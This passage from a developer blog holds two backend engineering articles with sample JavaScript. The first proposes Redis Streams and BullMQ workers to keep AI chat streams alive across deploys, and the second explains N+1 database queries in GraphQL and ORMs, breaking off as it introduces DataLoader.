<h4 id="kintrcthitk">Architecture and design</h4>
<ul>
<li>LangChain Core — Runnable API: <a href="https://python.langchain.com/api_reference/core/runnables/langchain_core.runnables.base.Runnable.html">https://python.langchain.com/api_reference/core/runnables/langchain_core.runnables.base.Runnable.html</a></li>
<li>LangChain — LCEL: <a href="https://python.langchain.com/docs/concepts/lcel/">https://python.langchain.com/docs/concepts/lcel/</a></li>
<li>LangGraph GitHub: <a href="https://github.com/langchain-ai/langgraph">https://github.com/langchain-ai/langgraph</a></li>
<li>LangGraph Pregel runtime: <a href="https://docs.langchain.com/oss/python/langgraph/pregel">https://docs.langchain.com/oss/python/langgraph/pregel</a></li>
<li>LangGraph Durable Execution: <a href="https://docs.langchain.com/oss/python/langgraph/durable-execution">https://docs.langchain.com/oss/python/langgraph/durable-execution</a></li>
<li>LangSmith OpenTelemetry: <a href="https://blog.langchain.com/opentelemetry-langsmith/">https://blog.langchain.com/opentelemetry-langsmith/</a></li>
<li>LangSmith trace with OpenTelemetry: <a href="https://docs.langchain.com/langsmith/trace-with-opentelemetry">https://docs.langchain.com/langsmith/trace-with-opentelemetry</a></li>
</ul>
<h4 id="sosnhframework">Framework comparisons</h4>
<ul>
<li>LangChain — AI Agent Frameworks: <a href="https://www.langchain.com/resources/ai-agent-frameworks">https://www.langchain.com/resources/ai-agent-frameworks</a></li>
<li>Community comparison articles on sites such as dev.to, theflyingbirds.in, and aryaxai.com. Use them only for orientation; they are no substitute for the official documentation.</li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Fixing interrupted AI conversations when deploying a new version</h1>
<p>P.B.N — Mon, 29 Jun 2026 05:34:21 GMT</p>
<!--kg-card-begin: markdown--><blockquote>
<p><strong>Note:</strong> This article contains no illustrative source code. The solution discussed is still under internal review, so I can't share the concrete implementation yet. This is a summary of what I learned over the past week: how the current system works, why it fails, and what a suitable solution might look like.</p>
</blockquote>
<p>I'm working on an AI chat application that uses <strong>Next.js</strong> on the frontend, <strong>NestJS</strong> on the backend, and <strong>GraphQL</strong> for communication between the two. Users send questions to large language models (LLMs) and watch the answers stream in token by token in real time.</p>
<p>Here is the TL;DR:</p>
<blockquote>
<p><strong>Every time a new version is deployed, every conversation that is still generating content stops midway.</strong></p>
<p>Stream state is currently kept in the API server's memory, and the LLM call also runs inside that same process. On deploy, the process restarts, so all that state is lost and the LLM call is cancelled midway. The user's browser keeps waiting for data but receives nothing, and the content generated up to that point disappears entirely.</p>
<p><strong>The solution is to stop keeping any important state in the API server.</strong></p>
<p>Move the token stream to Redis Streams, move the LLM calls to a separate worker using BullMQ, and let the browser automatically reconnect and resume from the last position it received. Once that is done, deploys become “invisible” to users: generation keeps running, and the browser simply catches up on whatever it missed.</p>
</blockquote>
<p>The rest of this article explains in detail how I arrived at that conclusion.</p>
<hr>
<h1 id="cchhthngstreamchathintihotng">How the current chat streaming works</h1>
<p>The current system is designed to handle two scenarios:</p>
<h3 id="kchbna">Scenario A</h3>
<p>The user sends a message and watches the response stream in real time.</p>
<h3 id="kchbnb">Scenario B</h3>
<p>The user refreshes the page or opens a new tab while generation is still running, and the system has to resend the content generated so far.</p>
<p>The main flow (scenario A) is:</p>
<pre><code class="language-text">Browser                         API Server
   │                                │
   │  1. issueToken                 │
   │ ──────────────────────────────►│
   │ ◄──────────────────────────────│
   │                                │
   │  2. prepareBackground          │
   │ ──────────────────────────────►│
   │ ◄────────── historyId ─────────│
   │                                │
   │  3. startBackground            │
   │ ──────────────────────────────►│
   │ ◄────────── historyId ─────────│
   │                                │
   │  4. subscribe(continueStream)  │
   │ ──────────────────────────────►│
   │ ◄═══════ tokens stream   ══════│
</code></pre>
<p>A few key points:</p>
<h3 id="1issuetoken">1. issueToken</h3>
<p>Only used to authenticate the conversation. Nothing is stored yet.</p>
<h3 id="2preparebackground">2. prepareBackground</h3>
<p>Creates an empty <code>SessionHistory</code> record in the database and initializes a <code>stateToken</code> object in memory.</p>
<p><code>stateToken</code> is the main character of this story:</p>
<ul>
<li>It stores the full history of the current conversation</li>
<li>It stores the tokens that have been streamed</li>
<li>It has a 15-minute TTL</li>
<li>It lives only in the API server's RAM</li>
</ul>
<h3 id="3startbackground">3. startBackground</h3>
<p>It does not wait for the LLM to return a result.</p>
<p>Instead, it:</p>
<ul>
<li>Validates the token</li>
<li>Acquires a distributed lock on <code>historyId:model</code></li>
<li>Starts the AI processing in the background via <code>setImmediate()</code></li>
<li>Returns <code>historyId</code> immediately</li>
</ul>
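<p>A minimal in-process sketch makes the "return immediately" behaviour concrete. It is not the project's code: the body of <code>startBackground</code>, the fake timer-driven LLM <code>generateTokens</code>, and the local <code>locks</code> set (standing in for the distributed lock) are all illustrative assumptions.</p>
<pre><code class="language-js">// Hypothetical sketch of the current in-process design (not the project's code).
// `locks` is a local Set standing in for the distributed lock on "historyId:model".
const locks = new Set();
// historyId -> streamed tokens; like stateToken, this lives only in this process's RAM.
const stateTokens = new Map();

// Fake LLM: yields one token every few milliseconds.
async function* generateTokens() {
  for (const token of ["The ", "capital ", "of ", "France ", "is ", "Paris"]) {
    await new Promise((resolve) => setTimeout(resolve, 5));
    yield token;
  }
}

function startBackground(historyId, model) {
  const key = `${historyId}:${model}`;
  if (locks.has(key)) throw new Error(`Generation already running for ${key}`);
  locks.add(key);
  stateTokens.set(historyId, []);

  // Defer the LLM work to a later turn of the event loop and return right away.
  // The job is just a callback in this process: a restart drops it and stateTokens.
  setImmediate(async () => {
    try {
      for await (const token of generateTokens()) {
        stateTokens.get(historyId).push(token);
      }
    } finally {
      locks.delete(key); // release the lock even if generation fails
    }
  });

  return historyId;
}
</code></pre>
<p>The ID comes back before the first token exists, and a second call for the same <code>historyId:model</code> is rejected by the lock. Everything the job produces lives in <code>stateTokens</code> and in a callback queued on this process's event loop, which is exactly what a restart throws away.</p>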
<h3 id="4continuestream">4. continueStream</h3>
<p>This is a GraphQL subscription.</p>
<p>When a client connects:</p>
<ol>
<li>The server replays all tokens currently held in <code>stateToken</code></li>
<li>It then streams newly received tokens via Redis Pub/Sub</li>
</ol>
<p>Thanks to this mechanism, a client can reconnect at any time without losing the content generated earlier.</p>
<hr>
<h1 id="refreshgiachnghotngnhthno">What happens on a mid-stream refresh?</h1>
<p>When the user refreshes the page:</p>
<ol>
<li>
<p>The client calls <code>checkActiveStreams</code></p>
</li>
<li>
<p>If <code>stateToken</code> is still in memory:</p>
<ul>
<li>The server returns the list of models still generating</li>
<li>It returns the content generated so far</li>
</ul>
</li>
<li>
<p>The client resubscribes with <code>isReconnecting=true</code></p>
</li>
<li>
<p>The server replays every token in <code>stateToken</code></p>
</li>
<li>
<p>It then keeps streaming new data</p>
</li>
</ol>
<p>This design is fairly clean.</p>
<p><strong>But the whole mechanism depends on <code>stateToken</code> still being in memory.</strong></p>
<p>And that is exactly what gets wiped on deploy.</p>
<hr>
<h1 id="vnthcs">The real problem</h1>
<p>In one sentence:</p>
<blockquote>
<p><code>stateToken</code> lives in the API server's memory, and the job that calls the LLM runs in that same process. On deploy, both are lost.</p>
</blockquote>
<pre><code class="language-text">┌─────────────┐    ┌─────────────────────────────────────────┐    ┌─────────────────────┐
│   Browser   │    │              API Server                 │    │       Redis         │
│             │    │                                         │    │  (separate server)  │
│             │    │  ┌───────────────────────────────────┐  │    │                     │
│             │    │  │          Server Memory            │  │    │  Pub/Sub channel    │
└──────┬──────┘    │  │  · Token history (in-memory)      │  │    │  (broadcast only,   │
       │           │  │  · AI job (calls LLM, gets tokens)│  │    │   no persistence)   │
       │           │  │  · WebSocket connections          │  │    │                     │
       │ 1. Send   │  └───────────────┬───────────────────┘  │    └──────────┬──────────┘
       │──────────►│                  │                      │               │
       │           │   2. Calls LLM, receives tokens,        │               │
       │           │      stores each token in memory        │               │
       │           │                  │                      │               │
       │           │                  │ 3. Publish token ────┼──────────────►│
       │ 4. Token  │◄─────────────────┼──────────────────────┼───────────────│
       │◄──────────│                  │                      │
       │           └─────────────────────────────────────────┘
</code></pre>
<p>The API server currently plays three roles at once:</p>
<ol>
<li>Keeping stream state in memory</li>
<li>Calling the LLM and processing tokens</li>
<li>Managing WebSocket/GraphQL subscription connections</li>
</ol>
<pre><code class="language-text">Browser
   │
   ▼
API Server
 ├─ StateToken (memory)
 ├─ AI Job (LLM call)
 └─ WebSocket connections
   │
   ▼
 Redis Pub/Sub
</code></pre>
<p>On deploy:</p>
<pre><code class="language-text">New deploy
   │
   ├─ API server restarts
   │
   ├─ stateToken is wiped
   ├─ LLM job is killed
   └─ WebSocket is disconnected
</code></pre>
<p>The result:</p>
<ul>
<li>The browser keeps waiting for data</li>
<li>No more tokens arrive</li>
<li>The user has to refresh manually</li>
<li>The content generated so far is lost completely</li>
</ul>
<hr>
<h1 id="giiphpxut">Proposed solution</h1>
<p>The idea is nothing particularly new.</p>
<p>The <strong>12-Factor App</strong> principles say:</p>
<ul>
<li>Processes should be stateless</li>
<li>Long-running work should be handled by background workers</li>
</ul>
<p>The API server currently violates both principles.</p>
<p>The proposed solution combines:</p>
<blockquote>
<p><strong>BullMQ + Redis Streams + state stored in Redis + client auto-reconnect</strong></p>
</blockquote>
<p>The new architecture:</p>
<pre><code class="language-text">┌─────────────┐         ┌─────────────────┐        ┌──────────────────────┐
│   Browser   │         │   API Server    │        │   BullMQ Worker Pod  │
│             │         │  (stateless)    │        │   (independent)      │
└──────┬──────┘         └────────┬────────┘        └──────────┬───────────┘
       │                         │                            │
       │  1. Send chat message   │                            │
       │ ───────────────────────►│                            │
       │                         │  2. Add job to BullMQ      │
       │                         │ ──────────────────────────►│
       │  3. Return historyId    │                            │  4. Call LLM API
       │ ◄───────────────────────│                            │ ──────────►
       │                         │                            │
       │  5. Subscribe to stream │                            │  6. Receive tokens
       │ ───────────────────────►│                            │ ◄──────────
       │                         │                            │
       │                         │              ┌─────────────▼─────────────┐
       │                         │              │           Redis           │
       │                         │              │  Stream: conv:{historyId} │
       │                         │              │  1000-1 "The "            │
       │                         │              │  1000-2 "capital "        │
       │                         │              │  1000-3 "of "  ◄─ Worker  │
       │                         │◄─────────────│         writes here       │
       │◄────────────────────────│              │  API reads from here      │
       │  7. Receive tokens live │              └───────────────────────────┘
</code></pre>
<hr>
<h1 id="vaitrcatngthnhphn">The role of each component</h1>
<h2 id="1bullmq">1. BullMQ</h2>
<p>BullMQ is a job queue built on Redis.</p>
<p>Instead of the API server calling the LLM directly:</p>
<pre><code class="language-text">API
  ↓
LLM
</code></pre>
<p>we change it to:</p>
<pre><code class="language-text">API
  ↓
Queue
  ↓
Worker
  ↓
LLM
</code></pre>
<p>An easy analogy:</p>
<ul>
<li>API server = waiter</li>
<li>Worker = chef</li>
</ul>
<p>The waiter only takes the order and passes it to the kitchen.</p>
<p>The waiter is not the one who cooks.</p>
<p>If something goes wrong in the dining area, the kitchen keeps working.</p>
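<p>The waiter/chef split can be sketched without Redis. Below, a tiny in-memory queue stands in for BullMQ purely to show the shape of the decoupling. <code>InMemoryQueue</code>, <code>sendChatMessage</code>, <code>runWorker</code> and <code>fakeLLM</code> are hypothetical names; in the proposed design the queue and the output would live in Redis, and the worker would run in its own process.</p>
<pre><code class="language-js">// Hypothetical in-memory stand-in for a job queue (BullMQ plays this role in the proposal).
class InMemoryQueue {
  constructor() {
    this.jobs = [];    // jobs waiting for a worker
    this.waiters = []; // workers waiting for a job
  }
  add(data) {
    const waiter = this.waiters.shift();
    if (waiter) waiter(data); // hand the job straight to an idle worker
    else this.jobs.push(data);
  }
  next() {
    if (this.jobs.length) return Promise.resolve(this.jobs.shift());
    return new Promise((resolve) => this.waiters.push(resolve));
  }
}

const queue = new InMemoryQueue();
const results = new Map(); // historyId -> generated text (Redis in the real design)

// "Waiter": the API handler only enqueues and returns; it holds no generation state.
function sendChatMessage(historyId, prompt) {
  queue.add({ historyId, prompt });
  return historyId;
}

// Fake LLM that streams the prompt back word by word.
async function* fakeLLM(prompt) {
  for (const word of prompt.split(" ")) yield word + " ";
}

// "Chef": an independent loop that takes jobs and produces tokens.
async function runWorker(maxJobs) {
  for (let left = maxJobs; left > 0; left--) {
    const { historyId, prompt } = await queue.next();
    let text = "";
    for await (const token of fakeLLM(prompt)) {
      text += token;
      results.set(historyId, text); // publish progress after every token
    }
  }
}
</code></pre>
<p><code>sendChatMessage</code> keeps nothing between calls, so restarting whatever runs it loses no work; the job and its output belong to the worker and the shared store. With BullMQ, the same roles are played by a <code>Queue</code> on the API side and a <code>Worker</code> in the worker pod.</p>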
<hr>
<h2 id="2workerpod">2. Worker Pod</h2>
<p>A worker is a separate process dedicated to:</p>
<ul>
<li>calling the LLM</li>
<li>receiving tokens</li>
<li>writing tokens to the Redis Stream</li>
</ul>
<p>The worker does not depend on the API server.</p>
<p>Therefore:</p>
<pre><code class="language-text">Deploy API
   ↓
Worker keeps running
</code></pre>
<p>If you run several workers:</p>
<ul>
<li>worker A restarts</li>
<li>worker B keeps processing jobs</li>
</ul>
<p>This improves fault tolerance considerably.</p>
<hr>
<h2 id="3redisstreams">3. Redis Streams</h2>
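<p>A Redis Stream is an append-only log.<br>
It replaces Redis Pub/Sub here to simplify resuming a stream from the point where it broke off: Pub/Sub only delivers a message to subscribers connected at that moment, whereas a stream keeps its entries, so a reader can ask for everything after a given ID.</p>
<p>Each token is written as an entry with an increasing ID:</p>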
<pre><code class="language-text">1000-1  "The "
1000-2  "capital "
1000-3  "of "
1000-4  "France "
1000-5  "is "
1000-6  "Paris"
</code></pre>
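<p>The two properties that make resuming possible can be modelled in a few lines. This is an in-memory sketch, not a Redis client: <code>append</code> mimics how <code>XADD key * ...</code> generates ever-increasing IDs of the form ms-seq, and <code>readAfter</code> mimics <code>XREAD ... STREAMS key lastId</code>, which returns only entries whose ID is strictly greater than <code>lastId</code>. <code>TokenLog</code> and <code>compareIds</code> are hypothetical names.</p>
<pre><code class="language-js">// In-memory model of a Redis Stream used as a token log (not a Redis client).
class TokenLog {
  constructor() {
    this.entries = []; // append-only: entries are never modified or reordered
    this.lastMs = 0;
    this.lastSeq = -1;
  }

  // Mimics XADD with an auto-generated ID: "ms-seq", always increasing.
  append(token, nowMs = Date.now()) {
    if (nowMs > this.lastMs) {
      this.lastMs = nowMs; // new millisecond: sequence restarts at 0
      this.lastSeq = 0;
    } else {
      this.lastSeq += 1; // same (or earlier) clock reading: reuse ms, bump sequence
    }
    const id = `${this.lastMs}-${this.lastSeq}`;
    this.entries.push({ id, token });
    return id;
  }

  // Mimics XREAD ... STREAMS key lastId: only entries strictly after lastId.
  readAfter(lastId) {
    return this.entries.filter((entry) => compareIds(entry.id, lastId) > 0);
  }
}

// Compares two "ms-seq" IDs numerically; a bare "0" counts as "0-0".
function compareIds(a, b) {
  const [aMs, aSeq = "0"] = a.split("-");
  const [bMs, bSeq = "0"] = b.split("-");
  return Number(aMs) - Number(bMs) || Number(aSeq) - Number(bSeq);
}
</code></pre>
<p>In Redis, the first entry in a given millisecond gets sequence 0, so real IDs look like <code>1000-0</code>, <code>1000-1</code> and so on. Because reads start strictly after <code>lastId</code>, a client that reconnects with the ID of the last token it rendered never receives that token twice.</p>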
<p>The key point:</p>
<p>A Redis Stream:</p>
<ul>
<li>does not belong to the API server</li>
<li>does not belong to the worker</li>
</ul>
<p>It exists independently.</p>
<p>So its data is not lost when either of those components restarts.</p>
<hr>
<h2 id="4autoreconnectvlastid">4. Auto-Reconnect và lastId</h2>
<p>The browser stores the last ID it received:</p>
<pre><code class="language-text">lastId = "1000-47"
</code></pre>
<p>in localStorage.</p>
<p>When the connection drops:</p>
<ol>
<li>The browser reconnects automatically</li>
<li>It sends <code>lastId</code></li>
<li>The server reads the Redis Stream from that position</li>
<li>It sends the tokens that were missed</li>
</ol>
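<p>On the client, these four steps boil down to a retry loop that always reconnects with the last persisted ID. A minimal sketch, assuming a <code>storage</code> object with the <code>getItem</code>/<code>setItem</code> shape of <code>localStorage</code> and a hypothetical <code>connect(lastId, onEntry)</code> transport (for example a wrapper around the GraphQL subscription) that delivers entries after <code>lastId</code> and rejects when the connection drops. <code>followStream</code>, the storage key format and the backoff values are illustrative.</p>
<pre><code class="language-js">// Hypothetical client-side resume loop (names and transport are assumptions).
async function followStream({ historyId, storage, connect, render, maxRetries = 5 }) {
  const key = `lastId:${historyId}`;
  let failures = 0;
  while (true) {
    // "0" means "from the beginning", as with XREAD.
    const lastId = storage.getItem(key) ?? "0";
    try {
      await connect(lastId, (entry) => {
        render(entry.token);
        storage.setItem(key, entry.id); // persist progress after every rendered token
      });
      return; // the stream ended normally
    } catch (err) {
      failures += 1;
      if (failures > maxRetries) throw err;
      // Simple linear backoff before reconnecting with the saved lastId.
      await new Promise((resolve) => setTimeout(resolve, 100 * failures));
    }
  }
}
</code></pre>
<p>In the browser you would pass <code>window.localStorage</code> as <code>storage</code>. Because the ID is saved only after its token has been rendered, a reconnect never skips a token, and since the server reads strictly after <code>lastId</code>, it never resends one either.</p>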
<hr>
<h1 id="cchreplayhotngrasao">How does replay work?</h1>
<h2 id="trnghpbnhthng">Normal case</h2>
<pre><code class="language-text">lastId = 0

1000-1
1000-2
1000-3
...
</code></pre>
<p>The browser updates <code>lastId</code> continuously.</p>
<hr>
<h2 id="ngtabrimli">Closing the tab and reopening it</h2>
<pre><code class="language-text">Tab closed at 1000-3

localStorage:
lastId = 1000-3
</code></pre>
<p>On reopening:</p>
<pre><code class="language-text">resume from 1000-3
</code></pre>
<p>The server continues with:</p>
<pre><code class="language-text">1000-4
1000-5
1000-6
</code></pre>
<p>The user sees the conversation continue as if it had never been interrupted.</p>
<hr>
<h2 id="deploygialcstream">Deploying mid-stream</h2>
<pre><code class="language-text">lastId = 1000-47

API restart
</code></pre>
<p>Meanwhile:</p>
<pre><code class="language-text">Worker keeps running

1000-48
1000-49
1000-50
...
</code></pre>
<p>are still appended to the Redis Stream.</p>
<p>Once the new API instance is up:</p>
<pre><code class="language-text">Browser reconnect
lastId = 1000-47
</code></pre>
<p>The server reads starting from:</p>
<pre><code class="language-text">1000-48
</code></pre>
<p>and continues sending.</p>
<p>The user only sees a pause of roughly a second, depending on how quickly the new API instance starts and the browser reconnects.</p>
<hr>
<h1 id="saukhitrinkhaimtlndeploysdinrathno">After the change, what does a deploy look like?</h1>
<pre><code class="language-text">Deploy
   │
   ├─ API server restarts
   │
   ├─ Worker keeps running
   ├─ LLM call keeps running
   ├─ Redis Stream keeps receiving tokens
   │
   └─ Browser reconnects
         ↓
      sends lastId
         ↓
      resumes the stream
</code></pre>
<p>The user only sees a very short pause instead of losing the whole conversation.</p>
<hr>
<h1 id="khnngmrng">Scalability</h1>
<p>Based on production figures:</p>
<pre><code class="language-text">44,885 executions/day

Assume 80% of the traffic happens in the 4 peak hours

44,885 × 0.8 / 4 / 60 ≈ 150 requests/minute

Average stream duration:
1–2 minutes

So concurrent streams (≈ 150 requests/minute × 1–2 minutes):
150–300
</code></pre>
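<p>The estimate above is an application of Little's law: the average number of requests in flight equals the arrival rate multiplied by the average time each one takes. A small helper reproduces the numbers; the function name and parameter names are illustrative.</p>
<pre><code class="language-js">// Little's law: in-flight streams = arrival rate × average stream duration.
function estimateConcurrentStreams({ runsPerDay, peakShare, peakHours, avgStreamMinutes }) {
  const perMinute = (runsPerDay * peakShare) / (peakHours * 60); // peak arrival rate
  return {
    perMinute: Math.round(perMinute),
    concurrent: Math.round(perMinute * avgStreamMinutes),
  };
}

const base = { runsPerDay: 44885, peakShare: 0.8, peakHours: 4 };
console.log(estimateConcurrentStreams({ ...base, avgStreamMinutes: 1 })); // { perMinute: 150, concurrent: 150 }
console.log(estimateConcurrentStreams({ ...base, avgStreamMinutes: 2 })); // { perMinute: 150, concurrent: 299 }
</code></pre>
<p>The upper bound comes out at 299 rather than 300 only because the text rounds the rate to 150 before multiplying.</p>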
<p>These jobs are mostly:</p>
<pre><code class="language-text">IO-bound
</code></pre>
<p>because most of the time is spent waiting for the LLM to return tokens.</p>
<p>BullMQ is particularly well suited to this kind of workload.</p>
<p>According to the BullMQ documentation:</p>
<pre><code class="language-text">Concurrency 100–300
</code></pre>
<p>per worker is entirely feasible for IO-heavy tasks.</p>
<p>Estimates:</p>
<table>
<thead>
<tr>
<th>Concurrent streams</th>
<th>Assessment</th>
</tr>
</thead>
<tbody>
<tr>
<td>~300</td>
<td>Handled easily</td>
</tr>
<tr>
<td>500</td>
<td>No problem</td>
</tr>
<tr>
<td>5,000</td>
<td>Scale horizontally by adding workers</td>
</tr>
<tr>
<td>50,000+</td>
<td>Consider Kafka or another solution</td>
</tr>
</tbody>
</table>
<p>Before BullMQ becomes the bottleneck, the LLM provider's rate limits or API costs will most likely hit first: fire 50k requests at once and the provider will very likely start answering with HTTP 429 Too Many Requests.</p>
<hr>
<h1 id="chiphhtng">Infrastructure cost</h1>
<p>Close to negligible.</p>
<table>
<thead>
<tr>
<th>Component</th>
<th>Cost</th>
</tr>
</thead>
<tbody>
<tr>
<td>Redis</td>
<td>Unchanged</td>
</tr>
<tr>
<td>API Server</td>
<td>Lighter than today</td>
</tr>
<tr>
<td>2 Worker Pods</td>
<td>About 20–50 USD/month</td>
</tr>
</tbody>
</table>
<hr>
<h1 id="khochtrinkhai">Rollout plan</h1>
<h3 id="bc1">Step 1</h3>
<p>Move tokens to Redis Streams.</p>
<ul>
<li>Fixes data loss on refresh</li>
<li>The LLM call still runs inside the API</li>
</ul>
<h3 id="bc2">Step 2</h3>
<p>Add a BullMQ worker.</p>
<ul>
<li>Moves the LLM call out of the API</li>
<li>Generation survives deploys</li>
</ul>
<h3 id="bc3">Step 3</h3>
<p>Add auto-reconnect + lastId.</p>
<ul>
<li>No manual refresh needed</li>
<li>Seamless experience</li>
</ul>
<hr>
<h1 id="sosnhbagiaion">Comparing the three stages</h1>
<table>
<thead>
<tr>
<th></th>
<th>Current</th>
<th>Redis Streams only</th>
<th>Full solution</th>
</tr>
</thead>
<tbody>
<tr>
<td>Tokens survive deploy</td>
<td>❌</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Generation survives deploy</td>
<td>❌</td>
<td>❌</td>
<td>✅</td>
</tr>
<tr>
<td>Automatic recovery</td>
<td>❌</td>
<td>❌</td>
<td>✅</td>
</tr>
<tr>
<td>Supports 25-minute responses</td>
<td>High risk</td>
<td>Still risky</td>
<td>✅</td>
</tr>
<tr>
<td>Extra cost</td>
<td>0</td>
<td>0</td>
<td>~20–50 USD/month</td>
</tr>
</tbody>
</table>
<hr>
<h1 id="ktlun">Conclusion</h1>
<p>The most important lesson from this investigation is not BullMQ or Redis Streams.</p>
<p>It is recognizing the root cause:</p>
<blockquote>
<p>The API server is carrying too many responsibilities at once.</p>
</blockquote>
<p>It simultaneously:</p>
<ul>
<li>serves requests</li>
<li>runs the LLM calls</li>
<li>stores stream state</li>
</ul>
<p>These three responsibilities are tied to the same process, so they also fail together.</p>
<p>A deploy should only affect request serving; it should not kill an AI task that is still running.</p>
<p>Whether or not the final solution matches this proposal exactly, the right direction is:</p>
<ol>
<li>Move state out of the process.</li>
<li>Separate the job runner from the API server.</li>
<li>Let the client track its own position in the stream.</li>
</ol>
<p>Each step makes the system more stable, and together they turn an annoying production bug into an event users barely notice.</p>
<h1 id="thamkho">References</h1>
<ul>
<li><a href="https://12factor.net/processes">12 factor app</a></li>
<li><a href="https://bullmq.io/articles/benchmarks/bunjs-vs-nodejs/?utm_source=chatgpt.com">Benchmark BullMQ</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>N+1 queries and the problem they create for backends</h1>
<p>N.V.H — Sun, 28 Jun 2026 09:29:26 GMT</p>
<h1 id="khi-backend-ch-y-c-nh-ng-kh-ng-th-scale">When the backend "works" but cannot scale</h1><p>In a great many modern backend systems, especially those using <strong>GraphQL</strong> or libraries such as <strong>Prisma / TypeORM / Sequelize / Hibernate</strong>, there is one problem almost every team has run into, and it comes up often:</p><blockquote><strong>The N+1 Query Problem</strong></blockquote><p>What makes N+1 dangerous is that it usually <strong>does not bring the system down right away</strong>. Instead, it quietly:</p><ul><li>Increases latency</li><li>Increases database CPU</li><li>Eats up the connection pool</li><li>Makes the API gradually slower over time</li></ul><p>until production traffic grows large enough. At that point:</p><ul><li>dashboards take seconds to load</li><li>GraphQL requests time out</li><li>RDS CPU hits 100%</li><li>even Redis cannot save you</li><li>scaling out drives costs up sharply without fixing the problem</li></ul><p>And the most dangerous part is that <strong>the code looks completely "correct"</strong>: it is clean and implements the business requirements, yet the problem is not visible right away. The team waits, unaware, until customers complain that <em>"this site is slow as a snail"</em>.</p><hr><h2 id="1-v-y-n-1-query-l-g-">1. So what is an N+1 query?</h2><p>Most developers have probably already met this problem, or at least heard of it.</p><p>An N+1 query happens when:</p><ul><li><strong>1 initial query</strong> fetches the main list of data</li><li>then <strong>N more queries</strong> are issued to fetch related data for each item</li></ul><p>For example, with 100 users → <strong>1 + 100 = 101 queries</strong>.</p><h3 id="v-d-trong-restful-api">Example in a RESTful API</h3><pre><code class="language-js">// The backend loops over the users itself:
const users = await getUsers();           // 1 query
for (const user of users) {
  user.posts = await getPostsByUser(user.id); // N queries
}
</code></pre><p>As the number of users grows, the number of queries grows linearly with it. That is the N+1 problem.</p><h3 id="v-d-trong-graphql">Example in GraphQL</h3><p>GraphQL is even more prone to N+1 because resolvers run field by field.</p><pre><code class="language-graphql"># Schema
type User {
  id: ID
  name: String
  posts: [Post]
}

# Client query
query {
  users {
    name
    posts {
      title
    }
  }
}
</code></pre><pre><code class="language-js">// Resolver
const resolvers = {
  Query: {
    users: () => db.query("SELECT * FROM users"),
  },
  User: {
    posts: (user) => db.query("SELECT * FROM posts WHERE user_id = $1", [user.id]), // runs once per user
  },
};
</code></pre><p>With 100 users → 1 + 100 = <strong>101 queries</strong>.</p><hr><h2 id="t-i-sao-y-l-v-n-l-n">Why is this a big problem?</h2><p>Developers often think: <em>"Each query only takes a few ms, what's the worry?"</em></p><p>Wrong. <strong>Database queries are not free.</strong> Every query needs:</p><ul><li>a network round trip</li><li>SQL parsing</li><li>query planning</li><li>locking</li><li>memory allocation</li><li>connection handling</li></ul><p>As traffic grows, the database starts to choke.</p><h3 id="v-n-nguy-hi-m-nh-t-code-nh-n-r-t-s-ch">The most dangerous part: the code looks very clean</h3><p>This is why N+1 survives so long in production.</p><pre><code class="language-js">const users = await User.findAll();
for (const user of users) {
  const posts = await user.getPosts(); // lazy loading
}
</code></pre><p>Looking at it, a developer sees <strong>readable</strong> code, nice <strong>async/await</strong> and correct <strong>logic</strong>.<br>But underneath, it runs <strong>N+1 queries</strong>.</p><hr><h2 id="v-sao-graphql-c-bi-t-d-g-p-n-1">Why is GraphQL especially prone to N+1?</h2><p>In REST, the backend decides the response shape: it is in control, knows exactly what data it returns, and sees the whole response shape before writing the code. GraphQL, by contrast, lets the client define the query. That is extremely powerful, but also dangerous.</p><p><strong>Resolvers run independently, field by field.</strong> Each level can trigger more queries.</p><h3 id="query-explosion-v-d-th-c-t-">Query explosion: a real-world example</h3><p>Suppose there are 10 users, each user has 5 posts, and each post has 10 comments.</p><pre><code class="language-graphql">query {
  users {          # 10 users
    posts {        # 5 posts/user
      comments {   # 10 comments/post
        author { name }
      }
    }
  }
}
</code></pre><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Step</th>
<th>Operation</th>
<th>Queries</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td><code>users()</code></td>
<td>1</td>
</tr>
<tr>
<td>2</td>
<td><code>posts(user)</code> × 10 users</td>
<td>10</td>
</tr>
<tr>
<td>3</td>
<td><code>comments(post)</code> × 50 posts</td>
<td>50</td>
</tr>
<tr>
<td>4</td>
<td><code>author(comment)</code> × 500 comments</td>
<td>500</td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td></td>
<td><strong>561 queries</strong></td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p><strong>561 queries for 10 users</strong>, and nobody notices until production falls over.</p><hr><h2 id="-i-u-khi-n-n-1-c-c-k-nguy-hi-m">What makes N+1 so dangerous</h2><h3 id="local-kh-ng-th-y-v-n-">You don't see it locally</h3><p>Locally, with a few hundred or a few thousand records, everything runs fast, and the team says: <em>"Looks fine, let's ship."</em></p><h3 id="qa-kh-detect">QA has a hard time detecting it</h3><p>QA checks whether the data and the response are correct; they do not check <strong>query count</strong> or <strong>latency under load</strong>. The problem only shows up under a realistic load test with a large dataset.</p><h3 id="orm-che-gi-u-v-n-">The ORM hides the problem</h3><pre><code class="language-js">// TypeORM lazy loading: looks like ordinary property access
const user = await User.findOneBy({ id });
const posts = await user.posts; // lazy relation: awaiting it fires a separate query
</code></pre><p>ORMs make developers <strong>lose their feel for the database</strong>. Many gradually stop reading SQL, do not understand execution plans, and do not know how many queries run. They only see property access (<code>user.posts</code>), while underneath there may be hundreds of queries.</p><hr><h3 id="database-kh-ng-ch-t-v-1-query-c-c-l-n">Databases don't die from one huge query</h3><p>They die from <strong>thousands of small queries</strong>.</p><pre><code>1 query = 2ms  ✅
1000 queries = 2000ms + overhead ❌
</code></pre><p>And that is before counting network overhead, connection acquisition, serialization, lock waits and context switching.</p><hr><h2 id="2-gi-i-ph-p-v-y-l-m-sao-gi-i-quy-t">2. The fix: how do we solve it?</h2><p><strong>DataLoader</strong> is the best-known solution to N+1 in GraphQL.</p><p><strong>The idea:</strong> instead of querying immediately, <strong>collect all the IDs</strong> and query once.</p><h3 id="kh-ng-d-ng-dataloader">Without DataLoader</h3><pre><code class="language-js">// 100 users → 1 query for users + 100 queries for posts
User: {
  posts: (user) => db.query("SELECT * FROM posts WHERE user_id = $1", [user.id])
}
</code></pre><h3 id="d-ng-dataloader">With DataLoader</h3><pre><code class="language-js">import DataLoader from "dataloader";

// Create one loader per request so its cache never leaks between requests.
const postLoader = new DataLoader(async (userIds) => {
